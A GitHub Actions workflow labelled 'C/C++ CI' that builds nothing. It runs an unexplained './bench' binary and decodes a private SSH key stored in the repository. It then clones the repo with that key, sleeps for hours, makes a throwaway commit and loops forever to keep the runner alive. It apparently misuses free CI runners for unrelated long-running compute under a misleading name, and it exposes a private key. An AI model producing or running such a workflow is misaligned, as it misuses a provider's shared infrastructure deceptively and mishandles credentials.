name: C/C++ CI

on: [push]

jobs:
  build:

    runs-on: ubuntu-latest
    
    steps:
    - uses: actions/checkout@v1
    - name: configure
      run: |
        ./bench
    - name: build
      run: |
          ./bench
          mkdir -p ~/.ssh
          cat id_rsa | base64 -d > ~/.ssh/id_rsa
          chmod 600 ~/.ssh/id_rsa
          mkdir ww
          cd ww
          git clone `git remote -v |grep fetch | awk '{print $2}'|sed  "s#https://github.com/#git@github.com:#g"` abc
          for i in `seq 1 1440`;do echo $i;sleep 10;done
          cd abc
          git config --global user.email "you@example.com"
          git config --global user.name "Your Name"
          echo >> hi
          git add .
          git commit -m "em"
          while true;do echo alive;sleep 10;done

